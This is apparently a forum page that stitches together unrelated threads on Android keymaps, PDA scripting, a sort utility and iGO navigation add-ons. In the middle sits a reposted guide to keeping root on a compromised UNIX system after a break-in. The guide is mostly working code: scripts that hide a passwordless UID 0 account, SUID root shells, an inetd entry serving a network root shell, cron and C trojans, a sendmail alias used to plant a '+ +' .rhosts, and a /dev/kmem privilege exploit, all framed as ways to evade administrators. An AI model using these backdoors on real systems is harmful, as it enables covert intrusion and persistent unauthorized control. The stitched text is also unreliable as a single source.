Related
Hello there.
According to this description:
http://www.kandroid.org/android_pdk/keymaps_keyboard_input.html
I am trying to create new layout with cyrillic characters (so i want to kind of introduce localization for input).
In order to do this I am changing some lines in file
./development/emulator/keymaps/qwerty.kcm
from:
Code:
[type=QWERTY]
# keycode display number base caps fn caps_fn
A 'A' '2' 'a' 'A' '#' 0x00
B 'B' '2' 'b' 'B' '<' 0x00
.....
to
Code:
[type=QWERTY]
# keycode display number base caps fn caps_fn
A 'A' '2' 'a' 'A' '#' 0x00
B 'Б' '2' 'б' 'Б' '<' 0x00
.....
which are supposed to be russian characters.
But compiling this yields in:
Code:
KeyCharMap: out/target/product/generic/obj/KEYCHARS/qwerty.kcm_intermediates/qwerty.kcm.bin
development/emulator/keymaps/qwerty.kcm:5: expected number or quoted ascii but got: 'а'
So it is seems like it does not like utf-8 characters. So, how am I supposed to create non-ascii layout?
You need to use UTF8 chars in quotation marks = "Б", try it again and pls post a file if you succeded
the same stuff:
Code:
[B][[email protected] bin]$ make[/B]
build/core/product_config.mk:229: WARNING: adding test OTA key
build/core/main.mk:177: implicitly installing apns-conf_sdk.xml
============================================
TARGET_PRODUCT=generic
TARGET_SIMULATOR=
TARGET_BUILD_TYPE=release
TARGET_ARCH=arm
TARGET_OS=linux
HOST_ARCH=x86
HOST_OS=linux
HOST_BUILD_TYPE=release
BUILD_ID=TC3
============================================
KeyCharMap: out/target/product/generic/obj/KEYCHARS/qwerty.kcm_intermediates/qwerty.kcm.bin
development/emulator/keymaps/qwerty.kcm:6: expected number or quoted ascii but got: "Б"
make: *** [out/target/product/generic/obj/KEYCHARS/qwerty.kcm_intermediates/qwerty.kcm.bin] Error 1
[B][[email protected] bin]$ cat development/emulator/keymaps/qwerty.kcm[/B]
[type=QWERTY]
# keycode display number base caps fn caps_fn
A 'A' '2' 'a' 'A' '#' 0x00
B "Б" '2' "б" "Б" '<' 0x00
......
you might try the numeric value for the characters instead. I'm not sure if that would work or not. I don't have much experience with non-US character sets
so, this is the file, which perform checking:
./build/tools/kcm/kcm.cpp:
the piece of code is:
Code:
static int
parse_number(const char* filename, int lineno, char* str, int* value)
{
int len = strlen(str);
if (len == 3 && str[0] == '\'' && str[2] == '\'') {
if (str[1] > 0 && str[1] < 127) {
*value = (int)str[1];
return 0;
} else {
fprintf(stderr, "%s:%d: only low ascii characters are allowed in"
" quotes near: %s\n", filename, lineno, str);
return 1;
}
}
char* endptr;
*value = strtol(str, &endptr, 0);
if (*endptr != '\0') {
fprintf(stderr, "%s:%d: expected number or quoted ascii but got: %s\n",
filename, lineno, str);
return 1;
}
if (*value >= 0xfffe || *value < 0) {
fprintf(stderr, "%s:%d: unicode char out of range (no negatives, "
"nothing larger than 0xfffe): %s\n", filename, lineno, str);
return 1;
}
return 0;
}
Anyone can say, how the charset should be formatted in order to pass this?
Ок, I found out.
Just change 'a' to 0xNNNN (with no qoutes around).
I've tested cyrillic layout with emulator -- it works fine.
Does anybody with root access what to try it on G1 ?
I'll provide you with layout file and instructions.
I am really interesting in trying this! Have rooted G1.
I've already tried, it works!
No I am trying to understand, how to write a simple utility, which will copy files back and forth in order to change layout.
http://forum.xda-developers.com/showthread.php?t=466705
please help - i wanna do this for hebrew chars
can u give me a quick run through of what you did to get this done and a more detaild explanation on how you overcome the unicode char failing in the file?
plus - if i understand correctly - you do not have english anymore on your keyboard - or is there something that allowes you to switch between langauges somehow (an android alt-shift or whatever?)
thanks,
E.
--
Peace
eladkatz said:
can u give me a quick run through of what you did to get this done and a more detaild explanation on how you overcome the unicode char failing in the file?
plus - if i understand correctly - you do not have english anymore on your keyboard - or is there something that allowes you to switch between langauges somehow (an android alt-shift or whatever?)
thanks,
E.
--
Peace
Click to expand...
Click to collapse
attached is the example of file with unicode chars
the only way to changes layouts i can see -- is to copy layout files back and forth
So, it actually does work, I wrote a simple app which changes key layout files as soon as you lunch it. It is kind of software layout switcher.
Main problem now: android seems to have some buffer, so layout does not change as soon as you replace a file. It take some random time or chars to input before changes applies.
So I am wondering if somebody knows how to force android to reload charmap?
Another thing that might help, if I can find out which process opens charmap file, it could really help. Unfortunately neither android nor busybox does not have lsof command.
more info:
I have noticed, that app reload the layout file the same time as garbage collector runs for this app. I don't know for sure, where GC initiate layout reloading or they both are initiated by some superior event.
I keep digging android sources, if anyone have any ideas I'll be glad to consider 'em.
keep us posted
dude, what you are doing is very interesting, and i'd aprreciate it if you could keep updating.
Thanks,
E.
i have a adp1, but i can´t put the file on my g1?
can someone please tell me how to do, or why don´t i have root acess?
thanks
eladkatz said:
dude, what you are doing is very interesting, and i'd aprreciate it if you could keep updating.
Thanks,
E.
Click to expand...
Click to collapse
2nd that! Appreciate your work, Worry. Thanx!
Can this be done for Bulgarian layout? I am searching something like this for a long time...
worry said:
I wrote a simple app which changes key layout files as soon as you lunch it.
Click to expand...
Click to collapse
Have you figured out how to access android filesystem from the Java app?
hello!file attached above was only src,need to be makekcharmap-ed,yes?can u plz put here compiled version because at this time don't have an ability 2 use computer and sdk to compile myself!thanks!!!
I have a question :
How to mod the input method ?
For an example : with input method, when I type double "A" it will become "Â", and it will back to "A" if I type triple "A".
(We use qwerty keyboard and input method controller to type our language, we don't have own keyboard as Rusian, Japan ...)
Really good job! Thanks!
Please, keep updating!
Hey guys,
I'm trying to create a batch script for deploying pda's and I need to disable the hardware buttons on a Pharos. Here's what i've found:
In a command line, you can use the command
Code:
REG DELETE \\HKLM\Software\microsoft\shell\keys\ /va /f
But i'm thinking this command deletes the LOCAL key on the computer, and I obviously need it to delete it on the PDA.
I've used this example:
Code:
REG DELETE KeyName [/v ValueName | /ve | /va] [/f]
KeyName [\\Machine\]FullKey
Machine Name of remote machine - omitting defaults to the current machine
Only HKLM and HKU are available on remote machines
FullKey ROOTKEY\SubKey
ROOTKEY [ HKLM | HKCU | HKCR | HKU | HKCC ]
SubKey The full name of a registry key under the selected ROOTKEY
ValueName The value name, under the selected Key, to delete
When omitted, all subkeys and values under the Key are deleted
/ve delete the value of empty value name <no name>
/va delete all values under this key
/f Forces the deletion without propmt
Examples:
REG DELETE HKLM\Software\MyCo\MyApp\Timeout
Deletes the registry key Timeout and its all subkeys and values
Anyone have a clue?
i would read up on doing it with morth scripts on the pda
I don't think that's an option, since I have 500+ devices to configure... I'll look into it, but i'm hoping someone could help me out with my first script.
/me = stupid.
I should've thought of this earlier: i can make a cabfile and then push it to the device with the batch script.
Problem solved.
eXtended Sort/Merge for Android
Hello all !
I suppose a very few of you have ever needed to sort a file on your Android phone ...
Eventually, you can use the standard Unix 'busybox sort' program in a Terminal Emulator instance :
sort -k 1.1,1.10 -o myOutFile.txt myInFile.txt
This will sort the input file, ordering lines from the first ten characters of each line, ascending.
Applied to a 50 MB file (500,000 lines of 100 bytes each), it takes about 50 sec. on my Galaxy Note.
So, I did a port of a mainframe-like sort/merge, along with a Gui, that does the same job in 5 to 7 sec.
For those interested in testing this application (see attachments), remarks, ideas [and bugs ...] are welcome in this thread.
The attachment contains :
hxsm : the binary program
xsmgui-v.vv.apk : the Gui application
50mt.txt : a 50 MB text file, given as an example above
Installation (adb ...) :
download and unzip the attached file,
push or copy 50mt.txt to /sdcard/tmp (or any other directory you can access)
push or copy hxsm to /data/local/bin (or any other directory in the standard PATH)
make it executable : shell chmod 777 /data/local/bin/hxsm
install the Gui : xsmgui-v.vv.apk
Check you have to read/write/execute on all directories involved (chmod 777 ...)
SnapShots and further explanations on next post.
And run Xsm carefully, first using the default parameters showed by the Gui:
in all cases, I will not be responsible of any failure/dommage on your phone.
Please post if possible :
Brand and model of your Android box
Android version (Gingerbread, ICS ...)
Cpu speed
Size of files(s) sorted
Duration of the job(s)
Furthermore, if you have room on your sdcard(s), you can get a larger sample text file, by copying the basic sample (50mt.txt) several times on itself, and sort it :
on my G.N., a 1 GB file (ten millions lines of 100 bytes each) is sorted in 180 sec.
Still, enjoy !
eXtended Sort/Merge for Android
Advanced Use
Those wanting more may directly invoke the hxsm command in a terminal emulator
For help, just enter 'hxsm' at the command prompt :
usage :
hxsm -c, --check -q|-v, --quiet|--verbose -h, --help
-m, --merge |--copy[|--sort]
-k, --key=all | start,len[,order(A|D),[format(B|C|I|P|Z|Y)] ]
-r, --recfm=F|V|M
-z|-l, --lrecl=nnnn
-i, --infile=in_id1[,recfm=x[,lrecl=nnn] --infile=in_id2....
-o, --outfile=out_id[,recfm=x[,lrecl=nnn]]
--outrec=(in_pos1,len1,out_pos1,type1[in_pos2,...])
-f, --field-separator=TAB|BAR|COMMA|COLUMN|SEMICOLUMN|c|0Xhh
-uk|-ur, --unique-key|--unique-record
--include=start,len,op,val[AND|OR,start,len,op,val...]
--exclude=start,len,op,val[AND|OR,start,len,op,val...]
-t --sortwork=dir1,dir2,.. --sortwork=dir3,dir4,..
-y, --storage=nnnK|M|G
--keep-order
-f --field-separator=TAB|COMMA|COLUMN|SEMICOLUMN|c|0Xhh
--record-separator=c|0xhh
--collating-sequence=ascii|ebcdic
--skip-head=nnn
--throw-empty-records
-E --ignore-ioerror [ = ignore short lines ]
--norun
Example for the job given as an example in post #1 :
hxsm --verbose --recfm=V --lrecl=250 --key=1,10 --input=/sdcard/tmp/50mt.txt --output=/sdcard/tmp/6=50mt-sorted.txt/FONT]
or
hxsm -v -rV -l250 -k 1,10 -i/sdcard/tmp/50mt.txt -o/sdcard/tmp/6=50mt-sorted.txt/FONT]
Explanation for some usefull options
-k : sort/merge keys
You may specify several keys
For each key, specify the start column (byte number starting at 1), the key length in bytes, and eventualy the letter 'D' for descending order.
Furthermore, for each key, you may also have 'specific' fields format, most inherited from IBM main frames, like 'Packed' or 'Zoned' decimal fields, or just 'Numeric'.
example :
hxsm ... -k 14,3,D,P --key=1,10,A,Z -k35,40 ... --recfm=F --lrecl=100
This will sort the file on a global key including:
a packed, signed decimal field (5 digits + sign), descending order
a zoned, signed, decimal field (10 digits, including sign)
an alphanumeric field (40 bytes).
Note that in that case, the file cannot be a text file, because possible x'0D' inside the packed field : it should be specified as 'Binary Fixed' (--recfm=F)
-i : input file
you can have several input files, provided that the sort key are at the same place in all files
example :
hxsm ... -i file1 --infile=file2 -ifile3 ...
--skip-head=nnn : throws the nnn fist lines/records
-m : merge several input files already sorted on the same key
example :
hxsm -m -o resulting_file -i file1 --infile=file2 -ifile3 ...
-t : sort-work directories
It may improve perpormances, provided you have more than 1 sdcard (a fast one, class 10), or a fast usb stick connected
If this is the case, just specify a workibg directory on the corresponding mount point :
example :
hxsm ... -t /mnt/sdcard/external_sd/tmp (and check you've done a chmod 777 on it ...)
Input/Output
if the -i option is omitted, then the program will read from stdin
if the -o option is omitted, then the program will write onto stdout
Filtering
You may filter the lines or records you want to be written onto the output :
-uk : unique key
if several lines/records have the same key, then only one will be written
-ur : unique record
if several lines/records are strictly identical, then only one will be written
--include=start,len,op,val ...
--exclude=start,len,op,val ...
takes in, or omits, lines/records whose field(s) responds to some criterias
Examples:
hxsm ... --include=12,3,EQ,C'ABC' ...
this will keep only records where there is 'ABC' in cols. 12-14
hxsm ... --include=12,3,EQ,C'ABC',OR,12,13,EQ,c'ABD' ...
this will keep only records where there is 'ABC' or 'ABD' in cols. 12-14
hxsm ... --exclude=15,1,EQ,C'Z' --include=12,3,EQ,XC'ABC' ...
this will throw all records having a 'Z' in col. 15,
then, in the records left, keep only those having 'ABC' in cols 12-14
Sorting 'CSV-like' files
If the input file(s) has no fixed keys location, but rather varying length fields,
then the fields are "SOMETHING SEPARATED" (i.e. column, semi-column, tabulation ...)
In this case, just specify the 'SOMETHING' with the -f (--field-separator=...) option.
The program will considered that all lines are made of fields separated by 'SOMETHING',
and that each length given in the '--key=' option is a MAXIMUM length.
For 'SOMETHING', you may specify :
--field-separator=TAB (0x09) or BAR (0x7C) or COLUMN (0x3A) or SEMI[-]COLUMN (0x3B)
or any hexadecimal value 0x00 .. 0XFF
Example :
hxsm ... -f TAB -k 3,5,D --key=1,10,A -k 5,40 -k2,9,A,N ...
This will sort the file on a global key including:
an alphanumeric key in field #3, max length 5 chars, descending order
an alphanumeric key in field #1, max length 10 chars
an alphanumeric key in field #5, max length 40 chars
a numeric key in field #2, max length 9 digits
All fields being separated by a TAB char (0x09).
eXtended Sort/Merge for Android
Snapshots
All snapshots are in the following attachment
(if anybody can tell me how tu put the snapshots 'online' ...)
Thanks, not for the mass but useful tool though.
hhenault said:
All snapshots are in the following attachment
(if anybody can tell me how tu put the snapshots 'online' ...)
Click to expand...
Click to collapse
Edit post -> Go Advanced -> Manage Attachments -> in the popup window add your pictures instead of the zip file, you can upload picts too.
I thought this was interesting paper written by an unknown author
You've been at it for all night. Trying all the exploits you can think of. The system seems tight. The system looks tight.
The system *is* tight. You've tried everything. Default passwds, guessable passwds, NIS weaknesses, NFS holes, incorrect
permissions, race conditions, SUID exploits, Sendmail bugs, and so on... Nothing.After seeming endless you've managed to steal root. Now what? How do you hold onto this precious super-user
privilege you have worked so hard to achieve....?
This list is BY NO MEANS comprehensive. There are as many ways to leave backdoors into a UNIX computer as there are
ways into one.
Beforehand
Know the location of critical system files. This should be obvious (If you can't list any of the top of your head, stop reading
now, get a book on UNIX, read it, then come back to me...). Familiarity with passwd file formats (including general 7 field
format, system specific naming conventions, shadowing mechanisms, etc...). Know vi. Many systems will not have those
robust, user-friendly editors such as Pico and Emacs. Vi is also quite useful for needing to quickly seach and edit a large file. If
you are connecting remotely (via dial-up/telnet/rlogin/whatver) it's always nice to have a robust terminal program that has a
nice, FAT scrollback buffer. This will come in handy if you want to cut and paste code, rc files, shell scripts, etc...
The permenance of these backdoors will depend completely on the technical saavy of the administrator. The experienced and
skilled administrator will be wise to many (if not all) of these backdoors. But, if you have managed to steal root, it is likely the
admin isn't as skilled (or up to date on bug reports) as she should be, and many of these doors may be in place for some time
to come. One major thing to be aware of, is the fact that if you can cover you tracks during the initial break-in, no one will be
looking for back doors.
The JDevil Overt
[1] Add a UID 0 account to the passwd file. This is probably the most obvious and quickly discovered method of rentry. It
flies a red flag to the admin, saying "WE'RE UNDER ATTACK!!!". If you must do this, my advice is DO NOT simply
prepend or append it. Anyone causally examining the passwd file will see this. So, why not stick it in the middle...
#!/bin/csh
# Inserts a UID 0 account into the middle of the passwd file.
# There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.
# [email protected]
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
echo passwd file has $linecount[1] lines.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
echo Creating two files, $linecount[1] lines each \(or approximately that\).
split -$linecount[1] ./temppass # passwd string optional
echo "jdevil::0:0:jdevil:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
NEVER, EVER, change the root password. The reasons are obvious.
[2] In a similar vein, enable a disabled account as UID 0, such as Sync. Or, perhaps, an account somwhere buried deep in the
passwd file has been abandoned, and disabled by the sysadmin. Change her UID to 0 (and remove the '*' from the second
field).
[3] Leave an SUID root shell in /tmp.
#!/bin/sh
# Everyone's favorite...
cp /bin/csh /tmp/.JDEVIL # Don't name it that...
chmod 4755 /tmp/.JDEVIL
Many systems run cron jobs to clean /tmp nightly. Most systems clean /tmp upon a reboot. Many systems have /tmp mounted
to disallow SUID programs from executing. You can change all of these, but if the filesystem starts filling up, people may
notice...but, hey, this *is* the overt section....). I will not detail the changes neccessary because they can be quite system
specific. Check out /var/spool/cron/crontabs/root and /etc/fstab.
The JDEVIL Veiled
[4] The super-server configuration file is not the first place a sysadmin will look, so why not put one there? First, some
background info: The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the
appropriate program (usally a server) when a connection request arrives. The format of the /etc/inetd.conf file is simple. Typical
lines look like this:
(1) (2) (3) (4) (5) (6) (7)
ftp stream tcp nowait root /usr/etc/ftpd ftpd
talk dgram udp wait root /usr/etc/ntalkd ntalkd
Field (1) is the daemon name that should appear in /etc/services. This tells inetd what to look for in /etc/services to determine
which port it should associate the program name with. (2) tells inetd which type of socket connection the daemon will expect.
TCP uses streams, and UDP uses datagrams. Field (3) is the protocol field which is either of the two transport protocols, TCP
or UDP. Field (4) specifies whether or not the daemon is iterative or concurrent. A 'wait' flag indicates that the server will
process a connection and make all subsequent connections wait. 'Nowait' means the server will accept a connection, spawn a
child process to handle the connection, and then go back to sleep, waiting for further connections. Field (5) is the user (or more
inportantly, the UID) that the daemon is run as. (6) is the program to run when a connection arrives, and (7) is the actual
command (and optional arguments). If the program is trivial (usally requiring no user interaction) inetd may handle it internally.
This is done with an 'internal' flag in fields (6) and (7).
So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it
with something else. A program that creates an SUID root shell, a program that adds a root account for you in the /etc/passwd
file, etc...
For the insinuation-impaired, try this:
Open the /etc/inetd.conf in an available editor. Find the line that reads:
daytime stream tcp nowait root internal
and change it to:
daytime stream tcp nowait /bin/sh sh -i.
You now need to restart /etc/inetd so it will reread the config file. It is up to you how you want to do this. You can kill and
restart the process, (kill -9 , /usr/sbin/inetd or /usr/etc/inetd) which will interuppt ALL network connections (so it is a good idea
to do this off peak hours).
[5] An option to compromising a well known service would be to install a new one, that runs a program of your choice. One
simple solution is to set up a shell the runs similar to the above backdoor. You need to make sure the entry appears in
/etc/services as well as in /etc/inetd.conf. The format of the /etc/services file is simple:
(1) (2)/(3) (4)
smtp 25/tcp mail
Field (1) is the service, field (2) is the port number, (3) is the protocol type the service expects, and (4) is the common name
associated with the service. For instance, add this line to /etc/services:
jdevil 22/tcp jdevil
and this line to /etc/inetd.conf:
jdevil stream tcp nowait /bin/sh sh -i
Restart inetd as before.
Note: Potentially, these are a VERY powerful backdoors. They not only offer local rentry from any account on the system,
they offer rentry from *any* account on *any* computer on the Internet.
[6] Cron-based trojan I. Cron is a wonderful system administration tool. It is also a wonderful tool for backdoors, since root's
crontab will, well, run as root... Again, depending on the level of experience of the sysadmin (and the implementation), this
backdoor may or may not last. /var/spool/cron/crontabs/root is where root's list for crontabs is usally located. Here, you have
several options. I will list a only few, as cron-based backdoors are only limited by your imagination. Cron is the clock daemon.
It is a tool for automatically executing commands at specified dates and times. Crontab is the command used to add, remove,
or view your crontab entries. It is just as easy to manually edit the /var/spool/crontab/root file as it is to use crontab. A crontab
entry has six fields:
(1) (2) (3) (4) (5) (6)
0 0 * * 1 /usr/bin/updatedb
Fields (1)-(5) are as follows: minute (0-59), hour (0-23), day of the month (1-31) month of the year (1-12), day of the week
(0-6). Field (6) is the command (or shell script) to execute. The above shell script is executed on Mondays. To exploit cron,
simply add an entry into /var/spool/crontab/root. For example: You can have a cronjob that will run daily and look in the
/etc/passwd file for the UID 0 account we previously added, and add him if he is missing, or do nothing otherwise (it may not
be a bad idea to actually *insert* this shell code into an already installed crontab entry shell script, to further obfuscate your
shady intentions). Add this line to /var/spool/crontab/root:
0 0 * * * /usr/bin/trojancode
This is the shell script:
#!/bin/csh
# Is our jdevil still on the system? Let's make sure he is.
#[email protected]
set JDEVILflag = (`grep jdevil /etc/passwd`)
if($#JDEVILflag == 0) then # Is he there?
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
split -$linecount[1] ./temppass # passwd string optional
echo "jdevil::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
else
endif
[7] Cron-based trojan II. This one was brought to my attention by our very own Mr. Zippy. For this, you need a copy of the
/etc/passwd file hidden somewhere. In this hidden passwd file (call it /var/spool/mail/.sneaky) we have but one entry, a root
account with a passwd of your choosing. We run a cronjob that will, every morning at 2:30am (or every other morning), save a
copy of the real /etc/passwd file, and install this trojan one as the real /etc/passwd file for one minute (synchronize swatches!).
Any normal user or process trying to login or access the /etc/passwd file would get an error, but one minute later, everything
would be ok. Add this line to root's crontab file:
29 2 * * * /bin/usr/_passwd
make sure this exists:
#echo "root:1234567890123:0:0perator:/:/bin/csh" > /var/spool/mail/.passwd
and this is the simple shell script:
#!/bin/csh
# Install trojan /etc/passwd file for one minute
#[email protected]
cp /etc/passwd /etc/.temppass
cp /var/spool/mail/passwd /etc/passwd
sleep 60
mv /etc/.temppass /etc/passwd
[8] Compiled code trojan. Simple idea. Instead of a shell script, have some nice C code to obfuscate the effects. Here it is.
Make sure it runs as root. Name it something innocous. Hide it well.
/* A little trojan to create an SUID root shell, if the proper argument is
given. C code, rather than shell to hide obvious it's effects. */
/* [email protected] */
#include
#define KEYWORD "industry3"
#define BUFFERSIZE 10
int main(argc, argv)
int argc;
char *argv[];{
int i=0;
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
/* This is the trojan part. */
system("cp /bin/csh /bin/.swp121");
system("chown root /bin/.swp121");
system("chmod 4755 /bin/.swp121");
}
}
/* Put your possibly system specific trojan
messages here */
/* Let's look like we're doing something... */
printf("Sychronizing bitmap image records.");
/* system("ls -alR / >& /dev/null > /dev/null&"); */
for(;i<10;i++){
fprintf(stderr,".");
sleep(1);
}
printf("\nDone.\n");
return(0);
} /* End main */
[9] The sendmail aliases file. The sendmail aliases file allows for mail sent to a particular username to either expand to several
users, or perhaps pipe the output to a program. Most well known of these is the uudecode alias trojan. Simply add the line:
"decode: "|/usr/bin/uudecode"
to the /etc/aliases file. Usally, you would then create a uuencoded .rhosts file with the full pathname embedded.
#! /bin/csh
# Create our .rhosts file. Note this will output to stdout.
echo "+ +" > tmpfile
/usr/bin/uuencode tmpfile /root/.rhosts
Next telnet to the desired site, port 25. Simply fakemail to decode and use as the subject body, the uuencoded version of the
.rhosts file. For a one liner (not faked, however) do this:
%echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail [email protected]
You can be as creative as you wish in this case. You can setup an alias that, when mailed to, will run a program of your
choosing. Many of the previous scripts and methods can be employed here.
The JDEVIL Covert
[10] Trojan code in common programs. This is a rather sneaky method that is really only detectable by programs such tripwire.
The idea is simple: insert trojan code in the source of a commonly used program. Some of most useful programs to us in this
case are su, login and passwd because they already run SUID root, and need no permission modification. Below are some
general examples of what you would want to do, after obtaining the correct sourcecode for the particular flavor of UNIX you
are backdooring. (Note: This may not always be possible, as some UNIX vendors are not so generous with thier sourcecode.)
Since the code is very lengthy and different for many flavors, I will just include basic psuedo-code:
get input;
if input is special hardcoded flag, spawn evil trojan;
else if input is valid, continue;
else quit with error;
...
Not complex or difficult. Trojans of this nature can be done in less than 10 lines of additional code.
The JDEVIL Esoteric
[11] /dev/kmem exploit. It represents the virtual of the system. Since the kernel keeps it's parameters in memory, it is possible
to modify the memory of the machine to change the UID of your processes. To do so requires that /dev/kmem have read/write
permission. The following steps are executed: Open the /dev/kmem device, seek to your page in memory, overwrite the UID of
your current process, then spawn a csh, which will inherit this UID. The following program does just that.
/* If /kmem is is readable and writable, this program will change the user's
UID and GID to 0. */
/* This code originally appeared in "UNIX security: A practical tutorial"
with some modifications by [email protected] */
#include
#include
#include
#include
#include
#include
#include
#define KEYWORD "nomenclature1"
struct user userpage;
long address(), userlocation;
int main(argc, argv, envp)
int argc;
char *argv[], *envp[];{
int count, fd;
long where, lseek();
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
fd=(open("/dev/kmem",O_RDWR);
if(fd<0){
printf("Cannot read or write to /dev/kmem\n");
perror(argv);
exit(10);
}
userlocation=address();
where=(lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(20);
}
count=read(fd,&userpage,sizeof(struct user));
if(count!=sizeof(struct user)){
printf("Cannot read user page\n");
perror(argv);
exit(30);
}
printf("Current UID: %d\n",userpage.u_ruid);
printf("Current GID: %d\n",userpage.g_ruid);
userpage.u_ruid=0;
userpage.u_rgid=0;
where=lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(40);
}
write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));
execle("/bin/csh","/bin/csh","-i",(char *)0, envp);
}
}
} /* End main */
#include
#include
#include
#define LNULL ((LDFILE *)0)
long address(){
LDFILE *object;
SYMENT symbol;
long idx=0;
object=ldopen("/unix",LNULL);
if(!object){
fprintf(stderr,"Cannot open /unix.\n");
exit(50);
}
for(;ldtbread(object,idx,&symbol)==SUCCESS;idx++){
if(!strcmp("_u",ldgetname(object,&symbol))){
fprintf(stdout,"User page is at 0x%8.8x\n",symbol.n_value);
ldclose(object);
return(symbol.n_value);
}
}
fprintf(stderr,"Cannot read symbol table in /unix.\n");
exit(60);
}
[12] Since the previous code requires /dev/kmem to be world accessable, and this is not likely a natural event, we need to take
care of this. My advice is to write a shell script similar to the one in [7] that will change the permissions on /dev/kmem for a
discrete amount of time (say 5 minutes) and then restore the original permissions. You can add this source to the source in [7]:
chmod 666 /dev/kmem
sleep 300 # Nap for 5 minutes
chmod 600 /dev/kmem # Or whatever it was before
JDevil
Happy Reading
There are some small spacing errors in code but you the idea
This threads will contains extensions for the navigation system based on NNG iGO PRIMO NextGen
Extend the functionality of regular buttons VIApoi remove from the route.
Standard button appears, if you have to route waypoints (VIApoi).
So it stays ... but when you click on it (click) menu appears, listing all VIApoi and
you are free to either tapnut elsewhere and remove the first in the queue
either by the victim ... long tapom remove everything to her ... and her too
Conveniently this is the case when you route with intermediate points and you for some reason "spilled" from it.
Re-start will lead to the fact that the navigator will lead to the first point ... but you have somewhere Intermedia ... here come in handy.
Plant ... in all weather conditions))
debugger
Debugger - debugging tool due to lack of log. You can view the result in ONLINE. You can "ON THE FLY" ... take snapshots directly from the cab.
Debugger You can use one or all of three ways at once.
*#
Call in the right place at the right time ... and save the data
If the variable Global - transferred to the "name", or simply herself. The number of input parameters is not limited.
Example
var1 = "hello"
local var2 = 8
t = {2,5, { "Bonnie Parker", "Clyde Barrow"}}
VW_Debugger ( "-------------------------------",
"Hex (var1)", - var1 must be GLOBAL
var1, var2, "t", "-------------------------------")
The result in the ... / lm_DebugToList.txt:
Variable # 1 = -------------------------------
Variable # 2 = 68 | 65 | 6C | 6C | 6F |
Variable # 2 = h | e | l | l | o |
Variable # 3 = hello
Variable # 4 = 8
t = {
[1] = 2,
[2] = 5,
Table # 3 = {
[1] = Bonnie Parker,
[2] = Clyde Barrow,
}
.
}
Variable # 6 = -------------------------------
*#
Enter code snippet ONLINE
Enter the line of code as you write in the body of the program.
Example
return hex (Help)
The results are on the screen and a file.
*#
Complex. But requires some setup allows to get a snapshot at any time
For this purpose has already been declared a global table VW_Debugger_Table and the following structure is used:
Example:
hook_DebugSnapshot: register (function ()
****UX_Name = "<name of your utilities>" --osoboe attention. Utility field
****VW_Debugger_Table.v_integer = v_integer - your variable
****VW_Debugger_Table.v_char = v_char --Your variable
****VW_Debugger_Table.v_table = v_table --Your variable
end)
It is desirable to place at the end of your utility body.
In other words - you need to put in your section (lua chunk) here such fragments, which will ensure the filling of the table
you desired variables. The process you manage yourself using SnapShot keys
I note that the third method does not require cleaning after the source code debugging. This tool can be left in the body of the program.
It can be activated at any time by pressing the button or VW_Debugger_Get_Snapshot () of the body of the program and does not interfere with the functionality of standard code.
All results are displayed on the screen and are available in /save/profile/01/userlist/lm_DebugToList.txt ... unless of course you do not erase.
CommonRouteWarnings.zip
Utility - informer. The name speaks for itself: CommonRouteWarnings.zip
All sounds and warning match again utverdennomu standard: SetAudioSignal.
Long press - access to the configurator.
Informer as a button in the cockpit. Informs about 12 developments on the route of choice.
They will be "PROKRUCHIVATYA" at one location in the cabin, but with different icons of different information and ... according to the chosen event he or events.
Upper information - the distance to the event, the bottom - time in the scene.
Now click on the icon will get a third of the current screen with an overview of the place, the relevant event, well, or automatically.
On the TMC. Upper infa - distance sobyliya, lower - latency, which makes this event (not to be confused with the overall delay)
Full set here
Hi there. working igo 8 would be interested. samsung s8 phone. I would like a link. Thanks